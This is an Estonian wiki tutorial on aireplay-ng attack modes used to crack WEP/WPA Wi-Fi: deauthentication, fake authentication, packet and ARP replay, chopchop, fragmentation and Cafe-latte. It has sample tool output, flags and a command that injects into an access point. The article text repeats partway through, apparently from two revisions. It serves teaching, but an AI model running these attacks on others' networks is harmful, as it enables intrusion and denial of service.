[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]

* Klient saadab autentimis päringu AP'le.[5]
* AP autentib kliendi.[5]
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]
* Klient assotsiaseerub AP'ga ja liitub võrguga.[5]
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP'le pakette(nõrkus).[5]

===Shared Key Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]

* Klient saadab autentimise päringu AP'le.[6]
* AP saadab kliendile ''random'' baidijada(ülesanne).[6]
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP'le.[6]
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP'l sama WEP võti, ning AP autentib kliendi ära.[6]
* Klient ühendub võrku.[6]

Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP'le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)

=Meetodid=
Meetodite pealkrijade ees on "Rünnak x:". x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.
==Rünnak 0: Deauthentication==

See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava ''access pointiga'' assotsiaseerunud. Klientide dissimisel võib olla mitu eesmärki:[2]

* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta broadcastis.[2]
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP cache tühjendada kui ühendus ära kaob)[2]

NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentimist.[2]

===Meetodid===

====Suunatud====
<pre>Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
12:35:25 Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]</pre>

* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]
* kanal peab olema sama millel AP reaalselt räägib[2]
* STMAC on rünnatava kliendi korrektne MAC aadress[2]

* '''Sending 64 directed''' - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP'le.[2]
* '''61''' - mitu paketti klient kätte sai[2]
* '''63''' - mitu paketti AP kätte sai[2]

Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64'le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]

Suunatud VS broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud disconnect paketti.[2]

Kui sulle kliendi ACK'ide arv on korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]

====Broadcast====
<pre>Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
15:49:32 Sending DeAuth to broadcast -- BSSID: [00:14:6C:7E:40:80]</pre>

Nagu mainitud, broadcast disconnect on vähem efektiivsem.

==Rünnak 1: Fake authentication==
Võlts autentimine lubab läbi viia nii Open System kui ka Shared key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP'le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]

Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga, kuna see ajab ruuteri segadusse(?). See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.

===Meetodid===
====Open Authentication====
Open authentication puhul ei üritata klienti enne assotsiamist autentida, seega saame kerge vaevaga ennast ära assotsida ning hakata AP'ga suhtlema. Selles etapis hakkavad tavakliendid WEP'i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP'le saatma, uuesti ja uuesti.[4]
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>
Sellisel juhul on assotsiaseerumine õnnestunud ja võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]

====Shared Key Authentication====
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP'ga assotsiaseeruda(me ei tea ju salajast võtit millega AP saadetud puzzle ära "lahendada") ning sellest tulenevalt ei saa me ka AP'le mingeid pakke saata.(?)
<pre>15:46:53 Sending Authentication Request
15:46:53 AP rejects open-system authentication
Please specify a PRGA-file (-y).</pre>

Sellisel juhul on vaja kinni püüda SKA handshake paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake'i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]

Kinnipüütud handshake'id salvestatakse "sharedkey-01-00-14-6C-7E-40-80.xor" formaadis faili. See fail tuleb vastavasse AP'sse fake autentimisel/kliendi disconnectimisks anda kaasa "-y" käsurea argumendiga.[7]

NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake'i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]

==Rünnak 2: Interactive packet replay==

See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV'sid.
Väga kasulik on panna peale ka "-m 68 -n 86" filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]

===Naturaalsed paketid===

Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida. AP'd edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on "To DS" lipuke seatud "1" peale.
Need filtrid on seadistatavad -b,-d ja -t argumentidega.[8]

===Manipuleeritavad pakid===

Eesmärk, nagu alati, on panna AP genereerima uusi IV'sid. Ainuke vajalik argument on "-t 1" - see selekteerib ainult pakette mis liiguvad etherneti suunas.

Me ei hooli ka mis lõppunkti MAC aadress on, kuna me saame selle ära muuta. Selleks on "-p 0841" argument, mis muudab paki põhimõtte selliseks nagu ta saadetaks kliendist AP'sse - põmst. muudab "To DS" lipu "1". Vaja on anda ka "-c" väärtuseks broadcast MAC.[8]

===Klientideta võrgu ründamine===
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP'd. Jooksuta aireplay-d kõige elementaarsemate argumentidega:
<pre>aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0</pre>

Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt "y" esimesele tulevale pakile ja AP hakkab IV'sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV'sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]

==Rünnak 3: ARP request replay attack==
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV'de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP'le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]

==Rünnak 4: KoreK chopchop attack==
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP'd ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]

===Teooria===
KoreK võttis hästituntud nõrga ICV[link] probleemi ja järeldas sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]

Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi plaintekst väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada) et luu abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või rejectitakse. Iga saadetud pakk baseerub arvatava baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]

<pre> .........
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Sent 957 packets, current guess: B9...

The AP appears to drop packets shorter than 35 bytes.
Enabling standard workaround: ARP header re-creation.

Saving plaintext in replay_dec-0201-191706.cap
Saving keystream in replay_dec-0201-191706.xor

Completed in 21s (2.29 bytes/s)</pre>
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine broadcasti ilma autentimata. Soovitatav on võtta ka lühem pakett kuna deükrptimise aeg on lineaarselt seotud paketi pikkusega.[10]

==Rünnak 5: Fragmentation attack==
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA'd. See rünnak ei tagasta WEP võtit. Saadud PRGA'ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP'lt vähemalt üks pakett.[12]

Põhimõtteliselt saab proigramm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(sisu on teada) AP'le. Kui pakett kajatakse tagasi AP poolt siis saab tagstatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]

See rünnak nõuab head ühendust AP'ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]

<pre>
Saving chosen packet in replay_src-0124-161120.cap
Data packet found!
Sending fragmented packet
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 384 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Trying to get 1500 bytes of a keystream
Got RELAYED packet!!
Thats our ARP packet!
Saving keystream in fragment-0124-161129.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
</pre>
Ja meil ongi olemas .xor fail millega saab custom pakette injectida. Muidugi on vajalik assotsitud klienti kelle nimelt pakette injectida.[12]

==Rünnak 6: Cafe-latte attack==
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - AP ei pea selles etapis tõestama et ta WEP võtit teab.
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]

See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki integrity kontroll.
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]

Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC'd et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]

Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]

===Kasutamine===
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama "-D" argumenti et lülitada välja AP otsimine.[14]

==Rünnak 7: Client-oriented fragmentation attack==
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 target IP ja target MAC peab olema nullbaidi jada.
Praktikas võib target MAC olla aga suvaline väärtus.[15]

Saadud pakis on teada koht kus asub source IP - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]

Valiidse ARP päringu saatmiseks kliendile peame liigutama source IP positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks incoming source IP positsioonile 33. Teine fragment on pakett mis kliendilt alguses saadi.[15]

IP Paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]

Igaljuhul kasutatakse CRC korrektsuse säilitamiseks bit-flippingut. Sama meetodit kasutatakse ka ARP paketi source MAC'i muutmiseks juhul kui seal on algselt multicast.[15]

=Viited=
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng

[2] http://www.aircrack-ng.org/doku.php?id=deauthentication

[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication

[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy

[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html

[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html

[7] http://www.aircrack-ng.org/doku.php?id=shared_key

[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay

[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection

[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop

[11] http://www.informit.com/guides/content.aspx?g=security&seqNum=197

[12] http://www.aircrack-ng.org/doku.php?id=fragmentation

[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2

[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte

[15] http://www.aircrack-ng.org/doku.php?id=hirte

\[\[Category:Traadita_side_alused]]

Aireplay-ng ründerežiimid

2011-05-10T08:55:16Z

Tliiv: /* Shared Key Authentication */

=Sissejuhatus=

Aireplay-ng`d kasutatakse ''frame''`de sisestamiseks võrguliiklusesse.[1]

Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA ''handshake'' pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]

=Eelteadmised=
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad ''backendis'' töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.

Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.

==WEP==
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi
===Open Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]

* Klient saadab autentimis päringu AP'le.[5]
* AP autentib kliendi.[5]
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]
* Klient assotsiaseerub AP'ga ja liitub võrguga.[5]
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP'le pakette(nõrkus).[5]

===Shared Key Authentication===
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]

* Klient saadab autentimise päringu AP'le.[6]
* AP saadab kliendile ''random'' baidijada(ülesanne).[6]
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP'le.[6]
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP'l sama WEP võti, ning AP autentib kliendi ära.[6]
* Klient ühendub võrku.[6]

Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP'le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)

=Meetodid=
Meetodite ees on "Rünnak x:". x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.
==Rünnak 0: Deauthentication==

See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava ''access pointiga'' assotsiaseerunud. Klientide dissimisel võib olla mitu eesmärki:[2]

* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta broadcastis.[2]
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP cache tühjendada kui ühendus ära kaob)[2]

NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentimist.[2]

===Meetodid===

====Suunatud====
<pre>Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
12:35:25 Sending 64 directed DeAuth. STMAC: [00:0F:B5:AE:CE:9D] [ 61|63 ACKs]</pre>

* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]
* kanal peab olema sama millel AP reaalselt räägib[2]
* STMAC on rünnatava kliendi korrektne MAC aadress[2]

* '''Sending 64 directed''' - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP'le.[2]
* '''61''' - mitu paketti klient kätte sai[2]
* '''63''' - mitu paketti AP kätte sai[2]

Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64'le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]

Suunatud VS broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud disconnect paketti.[2]

Kui sulle kliendi ACK'ide arv on korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]

====Broadcast====
<pre>Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
15:49:32 Sending DeAuth to broadcast -- BSSID: [00:14:6C:7E:40:80]</pre>

Nagu mainitud, broadcast disconnect on vähem efektiivsem.

==Rünnak 1: Fake authentication==
Võlts autentimine lubab läbi viia nii Open System kui ka Shared key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP'le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]

Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga, kuna see ajab ruuteri segadusse(?). See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.

===Meetodid===
====Open Authentication====
Open authentication puhul ei üritata klienti enne assotsiamist autentida, seega saame kerge vaevaga ennast ära assotsida ning hakata AP'ga suhtlema. Selles etapis hakkavad tavakliendid WEP'i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP'le saatma, uuesti ja uuesti.[4]
<pre>18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request
18:18:20 Association successful :-)</pre>
Sellisel juhul on assotsiaseerumine õnnestunud ja võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]

====Shared Key Authentication====
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP'ga assotsiaseeruda(me ei tea ju salajast võtit millega AP saadetud puzzle ära "lahendada") ning sellest tulenevalt ei saa me ka AP'le mingeid pakke saata.(?)
<pre>15:46:53 Sending Authentication Request
15:46:53 AP rejects open-system authentication
Please specify a PRGA-file (-y).</pre>

Sellisel juhul on vaja kinni püüda SKA handshake paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake'i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]

Kinnipüütud handshake'id salvestatakse "sharedkey-01-00-14-6C-7E-40-80.xor" formaadis faili. See fail tuleb vastavasse AP'sse fake autentimisel/kliendi disconnectimisks anda kaasa "-y" käsurea argumendiga.[7]

NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake'i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]

==Rünnak 2: Interactive packet replay==

See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV'sid.
Väga kasulik on panna peale ka "-m 68 -n 86" filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]

===Naturaalsed paketid===

Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida. AP'd edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on "To DS" lipuke seatud "1" peale.
Need filtrid on seadistatavad -b,-d ja -t argumentidega.[8]

===Manipuleeritavad pakid===

Eesmärk, nagu alati, on panna AP genereerima uusi IV'sid. Ainuke vajalik argument on "-t 1" - see selekteerib ainult pakette mis liiguvad etherneti suunas.

Me ei hooli ka mis lõppunkti MAC aadress on, kuna me saame selle ära muuta. Selleks on "-p 0841" argument, mis muudab paki põhimõtte selliseks nagu ta saadetaks kliendist AP'sse - põmst. muudab "To DS" lipu "1". Vaja on anda ka "-c" väärtuseks broadcast MAC.[8]

===Klientideta võrgu ründamine===
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP'd. Jooksuta aireplay-d kõige elementaarsemate argumentidega:
<pre>aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0</pre>

Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt "y" esimesele tulevale pakile ja AP hakkab IV'sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV'sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]

==Rünnak 3: ARP request replay attack==
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV'de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP'le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]

==Rünnak 4: KoreK chopchop attack==
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP'd ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]

===Teooria===
KoreK võttis hästituntud nõrga ICV[link] probleemi ja järeldas sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]

